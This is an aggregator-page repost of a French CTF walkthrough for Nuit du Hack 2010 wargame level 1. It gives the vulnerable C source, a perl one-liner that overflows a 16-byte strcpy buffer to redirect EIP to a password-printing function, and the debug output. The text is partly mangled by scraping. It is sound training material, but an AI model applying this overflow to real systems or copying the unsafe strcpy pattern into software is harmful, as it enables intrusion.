|
level1 wargame NDH2010 - tuto shellcode |
Si vous voulez bloquer ce service sur vos fils RSS
Si vous voulez nous contacter ou nous proposer un fil RSS
Menu > Articles de la revue de presse : - l'ensemble [ tous | francophone] - par mots clé [ tous] - par site [ tous] - le tagwall [ voir] - Top bi-hebdo de la revue de presse [ Voir]
level1 wargame NDH2010 - tuto shellcodePar infondLe [2010-06-29] à 01:41:36 Présentation : Cet article décrit la résolution du wargame level 1 de la nuit du hack 2010. L'intérêt réside dans la commande perl qui permet d'injecter une adresse hexa dans une invit de commande. solution ssh -2 level1 level1 wargame.nuitduhack.com level1 srv-public . level1 perl -e print 'A' x 20,chr 0x04,chr 0x85,chr 0x04,chr 0x08 dummy is at 0x08048504 before SEBP 0xbffff808 SEIP 0x080485fd after SEBP 0x41414141 SEIP 0x08048504 motdepasse mode opératoire Connectons nous en SSH au serveur. level1 level1 wargame.nuitduhack.com's password _ _ ____ _ _ ____ ___ _ ___ _ ' ' ___ _ u _ u _ U __ U u u U U uU _ U _ u __ ,-. ,-. _ ____ u _ _ _____u _ ,-._ _ ,-, Qu'y a t-il dans le répertoire level1 srv-public ls level1 level1.c passwd Essayons level1 level1 srv-public . level1 A dummy is at 0x08048504 before SEBP 0xbffff838 SEIP 0x080485fd after SEBP 0xbffff838 SEIP 0x080485fd Testons le buffer overflow level1 srv-public . level1 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA dummy is at 0x08048504 before SEBP 0xbffff7f8 SEIP 0x080485fd after SEBP 0x41414141 SEIP 0x41414141 Erreur de segmentation Téléchargeons le contenu du répertoire pour travailler en local scp level1 wargame.nuitduhack.com . Voyons le code source du fichier vulnérable. La fonction dummy nous donne ce qu'il faut pour atteindre le level2. level1 srv-public cat level1.c include include include void dummy setresuid geteuid ,geteuid ,geteuid system sleep 1 cat home level2 passwd exit 0 int p void func char arg char buf 16 p int printf dummy is at 0xpourcents08x n , dummy printf before SEBP pourcentsp n t SEIP 0xpourcents08x n , p, p 1 strcpy buf, arg printf after SEBP pourcentsp n t SEIP 0xpourcents08x n , p, p 1 int main int argc, char argv if argv 1 printf No command found... n return func argv 1 L'adresse de dummy qui nous est donnée est correcte. En effet, voyons le dump assembleur de level1 objdump -d level1 grep 08048504 Il y a 20 caractères avant d'écraser EIP level1 srv-public . level1 AAAAAAAAAAAAAAAAAAAAAAAA dummy is at 0x08048504 before SEBP 0xbffff828 SEIP 0x080485fd after SEBP 0x41414141 SEIP 0x41414141 Erreur de segmentation level1 srv-public . level1 AAAAAAAAAAAAAAAAAAAA dummy is at 0x08048504 before SEBP 0xbffff828 SEIP 0x080485fd after SEBP 0x41414141 SEIP 0x08048500 Erreur de segmentation Les mots clés de la revue de presse pour cet article : shellcode Les videos sur SecuObs pour les mots clés : shellcode Les éléments de la revue Twitter pour les mots clé : shellcode Les derniers articles du site "infond" :- openvpn et iphone- tutoriel openvpn- sécuriser un wiki- list of blogs- création de la communauté infond- howto find a specific string in an unmounted hard disk- Howto add a header banner to MediaWiki- utiliser son iphone comme modem USB 3G sous ubuntu- progresser en sécurité informatique- quelques outils pour RSA
Menu > Articles de la revue de presse : - l'ensemble [ tous | francophone] - par mots clé [ tous] - par site [ tous] - le tagwall [ voir] - Top bi-hebdo de la revue de presse [ Voir]
Si vous voulez bloquer ce service sur vos fils RSS :
- avec iptables "iptables -A INPUT -s 88.191.75.173 --dport 80 -j DROP"
- avec ipfw et wipfw "ipfw add deny from 88.191.75.173 to any 80"
- Nous contacter par mail
Mini-Tagwall des articles publiés sur SecuObs : | | | | sécurité, exploit, windows, attaque, outil, microsoft, réseau, audit, metasploit, vulnérabilité, système, virus, internet, usbsploit, données, source, linux, protocol, présentation, scanne, réseaux, scanner, bluetooth, conférence, reverse, shell, meterpreter, vista, rootkit, détection, mobile, security, malicieux, engineering, téléphone, paquet, trames, https, noyau, utilisant, intel, wishmaster, google, sysun, libre |
Mini-Tagwall de l'annuaire video : | | | | curit, security, biomet, metasploit, biometric, cking, password, windows, botnet, defcon, tutorial, crypt, xploit, exploit, lockpicking, linux, attack, wireshark, vmware, rootkit, conference, network, shmoocon, backtrack, virus, conficker, elcom, etter, elcomsoft, server, meterpreter, openvpn, ettercap, openbs, iphone, shell, openbsd, iptables, securitytube, deepsec, source, office, systm, openssh, radio |
Mini-Tagwall des articles de la revue de presse : | | | | security, microsoft, windows, hacker, attack, network, vulnerability, google, exploit, malware, internet, remote, iphone, server, inject, patch, apple, twitter, mobile, virus, ebook, facebook, vulnérabilité, crypt, source, linux, password, intel, research, virtual, phish, access, tutorial, trojan, social, privacy, firefox, adobe, overflow, office, cisco, conficker, botnet, pirate, sécurité |
Mini-Tagwall des Tweets de la revue Twitter : | | | | security, linux, botnet, attack, metasploit, cisco, defcon, phish, exploit, google, inject, server, firewall, network, twitter, vmware, windows, microsoft, compliance, vulnerability, python, engineering, source, kernel, crypt, social, overflow, nessus, crack, hacker, virus, iphone, patch, virtual, javascript, malware, conficker, pentest, research, email, password, adobe, apache, proxy, backtrack |
|
|
|
|
|